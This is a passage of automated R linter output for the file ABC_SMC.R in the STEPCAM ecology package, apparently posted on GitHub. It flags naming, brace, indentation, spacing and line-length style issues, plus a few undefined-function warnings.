numParticles)\n^\n```\n[R/ABC_SMC.R:44:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L44) *style:* **Variable and function names should be all lowercase.**\n```r\n​normalizeWeights <- function(x)\n^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:45:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L45) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​{\n^\n```\n[R/ABC_SMC.R:45:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t   output <- list( DA = d[,1],HF = d[,2], LS = d[,3]);\n^\n```\n[R/ABC_SMC.R:46:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t   cat(\"Found previously finished run, loaded results from that run\\n\"); flush.console();\n^\n```\n[R/ABC_SMC.R:47:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t   return(output);\n^\n```\n[R/ABC_SMC.R:52:24:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L52) *style:* **Variable and function names should be all lowercase.**\n```r\n​perturb <- function(p, sigM)\n                       ^~~~\n```\n[R/ABC_SMC.R:53:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L53) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​{\n^\n```\n[R/ABC_SMC.R:58:34:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L58) *style:* **Put spaces around all infix operators.**\n```r\n​  x <- sample(numbers, 3, replace=F);\n                                ~^~\n```\n[R/ABC_SMC.R:60:3:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L60) *style:* **Variable and function names should be all lowercase.**\n```r\n​  oldVal <- params[x[1]];\n  ^~~~~~\n```\n[R/ABC_SMC.R:62:65:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L62) *style:* **Variable and function names should be all lowercase.**\n```r\n​  params[x[1]] <- round(params [x[1]] + rnorm(1, mean = 0, sd = sigM), 0);\n                                                                ^~~~\n```\n[R/ABC_SMC.R:66:27:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L66) *style:* **Variable and function names should be all lowercase.**\n```r\n​  diff <- params [x[1]] - oldVal;\n                          ^~~~~~\n```\n[R/ABC_SMC.R:80:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L80) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateDistance <- function(rich, even, div, opt_diff, obs, sd_vals)\n^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:81:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L81) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​{\n^\n```\n[R/ABC_SMC.R:82:20:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L82) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  Fit_Rich <- (abs((rich - obs[,1])) / sd_vals[1])^2;\n                   ^\n```\n[R/ABC_SMC.R:82:33:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L82) *style:* **Commas should always have a space after.**\n```r\n​  Fit_Rich <- (abs((rich - obs[,1])) / sd_vals[1])^2;\n                                ^\n```\n[R/ABC_SMC.R:82:51:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L82) *style:* **Put spaces around all infix operators.**\n```r\n​  Fit_Rich <- (abs((rich - obs[,1])) / sd_vals[1])^2;\n                                                 ~^~\n```\n[R/ABC_SMC.R:83:20:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L83) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  Fit_Even <- (abs((even - obs[,2])) / sd_vals[2])^2;\n                   ^\n```\n[R/ABC_SMC.R:83:33:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L83) *style:* **Commas should always have a space after.**\n```r\n​  Fit_Even <- (abs((even - obs[,2])) / sd_vals[2])^2;\n                                ^\n```\n[R/ABC_SMC.R:83:51:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L83) *style:* **Put spaces around all infix operators.**\n```r\n​  Fit_Even <- (abs((even - obs[,2])) / sd_vals[2])^2;\n                                                 ~^~\n```\n[R/ABC_SMC.R:84:20:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L84) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  Fit_Div  <- (abs((div -  obs[,3])) / sd_vals[3])^2;\n                   ^\n```\n[R/ABC_SMC.R:84:33:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L84) *style:* **Commas should always have a space after.**\n```r\n​  Fit_Div  <- (abs((div -  obs[,3])) / sd_vals[3])^2;\n                                ^\n```\n[R/ABC_SMC.R:84:51:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L84) *style:* **Put spaces around all infix operators.**\n```r\n​  Fit_Div  <- (abs((div -  obs[,3])) / sd_vals[3])^2;\n                                                 ~^~\n```\n[R/ABC_SMC.R:85:40:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L85) *style:* **Put spaces around all infix operators.**\n```r\n​  Fit_optima <- (opt_diff / sd_vals[4])^2;\n                                      ~^~\n```\n[R/ABC_SMC.R:93:21:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L93) *style:* **Variable and function names should be all lowercase.**\n```r\n​ABC_SMC <- function(numParticles, species_fallout, taxa, esppres, n_traits,\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:94:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L94) *style:* **lines should not be more than 80 characters.**\n```r\n​sd_vals, summary_stats, community_number, species, abundances, frequencies, stopRate, Ord)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:94:77:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L94) *style:* **Variable and function names should be all lowercase.**\n```r\n​sd_vals, summary_stats, community_number, species, abundances, frequencies, stopRate, Ord)\n                                                                            ^~~~~~~~\n```\n[R/ABC_SMC.R:95:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L95) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​{\n^\n```\n[R/ABC_SMC.R:98:3:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  dispVals <- 1:numParticles;\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:98:17:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  dispVals <- 1:numParticles;\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:99:3:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L99) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filtVals <- 1:numParticles;\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:99:17:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L99) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filtVals <- 1:numParticles;\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:100:3:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L100) *style:* **Variable and function names should be all lowercase.**\n```r\n​  compVals <- 1:numParticles;\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:100:17:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L100) *style:* **Variable and function names should be all lowercase.**\n```r\n​  compVals <- 1:numParticles;\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:102:13:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L102) *style:* **Variable and function names should be all lowercase.**\n```r\n​  fits <- 1:numParticles;\n            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:103:3:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L103) *style:* **Variable and function names should be all lowercase.**\n```r\n​  RichVec <- 1:numParticles;\n  ^~~~~~~\n```\n[R/ABC_SMC.R:103:16:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L103) *style:* **Variable and function names should be all lowercase.**\n```r\n​  RichVec <- 1:numParticles;\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:104:3:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L104) *style:* **Variable and function names should be all lowercase.**\n```r\n​  EveVec <- 1:numParticles;\n  ^~~~~~\n```\n[R/ABC_SMC.R:104:15:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L104) *style:* **Variable and function names should be all lowercase.**\n```r\n​  EveVec <- 1:numParticles;\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:105:3:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L105) *style:* **Variable and function names should be all lowercase.**\n```r\n​  DivVec <- 1:numParticles;\n  ^~~~~~\n```\n[R/ABC_SMC.R:105:15:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L105) *style:* **Variable and function names should be all lowercase.**\n```r\n​  DivVec <- 1:numParticles;\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:106:3:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L106) *style:* **Variable and function names should be all lowercase.**\n```r\n​  OptVec <- 1:numParticles;\n  ^~~~~~\n```\n[R/ABC_SMC.R:106:15:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L106) *style:* **Variable and function names should be all lowercase.**\n```r\n​  OptVec <- 1:numParticles;\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:108:3:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L108) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextDisp <- dispVals;\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:108:15:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L108) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextDisp <- dispVals;\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:109:3:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L109) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextFilt <- filtVals;\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:109:15:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L109) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextFilt <- filtVals;\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:110:3:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L110) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextComp <- compVals;\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:110:15:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L110) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextComp <- compVals;\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:112:21:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L112) *style:* **Variable and function names should be all lowercase.**\n```r\n​  weights <- rep(1, numParticles);\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:113:3:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L113) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextWeights <- rep(1, numParticles);\n  ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:113:25:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L113) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextWeights <- rep(1, numParticles);\n                        ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:114:16:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L114) *style:* **Variable and function names should be all lowercase.**\n```r\n​  indices <- 1:numParticles;\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:120:6:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L120) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​   if(length(f) > 0)\n     ^\n```\n[R/ABC_SMC.R:121:3:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L121) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​  {\n  ^\n```\n[R/ABC_SMC.R:123:12:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L123) *style:* **Put spaces around all infix operators.**\n```r\n​    t1 <- 1+length(f);\n          ~^~\n```\n[R/ABC_SMC.R:127:5:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L127) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- d[,1];\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:127:20:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L127) *style:* **Commas should always have a space after.**\n```r\n​    dispVals <- d[,1];\n                   ^\n```\n[R/ABC_SMC.R:128:5:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L128) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- d[,2];\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:128:20:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L128) *style:* **Commas should always have a space after.**\n```r\n​    filtVals <- d[,2];\n                   ^\n```\n[R/ABC_SMC.R:129:5:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L129) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- d[,3];\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:129:20:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L129) *style:* **Commas should always have a space after.**\n```r\n​    compVals <- d[,3];\n                   ^\n```\n[R/ABC_SMC.R:130:20:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L130) *style:* **Commas should always have a space after.**\n```r\n​    fits <-     d[,8];\n                   ^\n```\n[R/ABC_SMC.R:131:20:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L131) *style:* **Commas should always have a space after.**\n```r\n​    weights <-  d[,9];\n                   ^\n```\n[R/ABC_SMC.R:134:11:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L134) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(d[numParticles,1] == numParticles)\n          ^\n```\n[R/ABC_SMC.R:134:14:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L134) *style:* **Variable and function names should be all lowercase.**\n```r\n​\tif(d[numParticles,1] == numParticles)\n             ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:134:30:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L134) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(d[numParticles,1] == numParticles)\n                            ~^~~\n```\n[R/ABC_SMC.R:134:33:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L134) *style:* **Variable and function names should be all lowercase.**\n```r\n​\tif(d[numParticles,1] == numParticles)\n                                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:135:5:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L135) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​    {\n    ^\n```\n[R/ABC_SMC.R:136:35:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L136) *style:* **Put spaces around all infix operators.**\n```r\n​       d <- read.table(f[length(f)-1],header=F);\n                                 ~^~\n```\n[R/ABC_SMC.R:136:39:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L136) *style:* **Commas should always have a space after.**\n```r\n​       d <- read.table(f[length(f)-1],header=F);\n                                      ^\n```\n[R/ABC_SMC.R:136:45:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L136) *style:* **Put spaces around all infix operators.**\n```r\n​       d <- read.table(f[length(f)-1],header=F);\n                                           ~^~\n```\n[R/ABC_SMC.R:137:19:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L137) *style:* **Put spaces around all infix operators.**\n```r\n​\t   output <- list( DA = d[,1],HF = d[,2], LS = d[,3]);\n                 ~^~~\n```\n[R/ABC_SMC.R:137:31:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L137) *style:* **Put spaces around all infix operators.**\n```r\n​\t   output <- list( DA = d[,1],HF = d[,2], LS = d[,3]);\n                             ~^~\n```\n[R/ABC_SMC.R:137:42:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L137) *style:* **Put spaces around all infix operators.**\n```r\n​\t   output <- list( DA = d[,1],HF = d[,2], LS = d[,3]);\n                                        ~^\n```\n[R/ABC_SMC.R:137:54:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L137) *style:* **Put spaces around all infix operators.**\n```r\n​\t   output <- list( DA = d[,1],HF = d[,2], LS = d[,3]);\n                                                    ~^~\n```\n[R/ABC_SMC.R:138:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L138) *style:* **lines should not be more than 80 characters.**\n```r\n​\t   cat(\"Found previously finished run, loaded results from that run\\n\"); flush.console();\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:144:8:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L144) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  while(t < 50)\n       ^\n```\n[R/ABC_SMC.R:145:3:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L145) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​  {\n  ^\n```\n[R/ABC_SMC.R:147:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L147) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      if ((numberAccepted)%%(numParticles / PRINT_FREQ) == 0)\n^\n```\n[R/ABC_SMC.R:153:5:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L153) *style:* **Variable and function names should be all lowercase.**\n```r\n​    numberAccepted <- 0;\n    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:154:7:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L154) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(t != 1) weights <- normalizeWeights(weights);\n      ^\n```\n[R/ABC_SMC.R:154:27:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L154) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(t != 1) weights <- normalizeWeights(weights);\n                          ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:154:27:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L154) *warning:* **no visible global function definition for ‘normalizeWeights’**\n```r\n​    if(t != 1) weights <- normalizeWeights(weights);\n                          ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:162:10:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L162) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    while(numberAccepted < numParticles)\n         ^\n```\n[R/ABC_SMC.R:162:11:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L162) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while(numberAccepted < numParticles)\n          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:162:28:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L162) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while(numberAccepted < numParticles)\n                           ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:163:5:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L163) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​    {\n    ^\n```\n[R/ABC_SMC.R:167:9:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L167) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      if(t == 1)\n        ^\n```\n[R/ABC_SMC.R:168:7:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L168) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​      {\n      ^\n```\n[R/ABC_SMC.R:169:19:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L169) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getRandomVals(species_fallout);\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:169:19:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L169) *warning:* **no visible global function definition for ‘getRandomVals’**\n```r\n​        params <- getRandomVals(species_fallout);\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:171:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L171) *style:* **lines should not be more than 80 characters.**\n```r\n​        params <- getFromPrevious(indices, weights, dispVals, filtVals, compVals);\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:171:19:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L171) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights, dispVals, filtVals, compVals);\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:171:19:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L171) *warning:* **no visible global function definition for ‘getFromPrevious’**\n```r\n​        params <- getFromPrevious(indices, weights, dispVals, filtVals, compVals);\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:171:53:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L171) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights, dispVals, filtVals, compVals);\n                                                    ^~~~~~~~\n```\n[R/ABC_SMC.R:171:63:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L171) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights, dispVals, filtVals, compVals);\n                                                              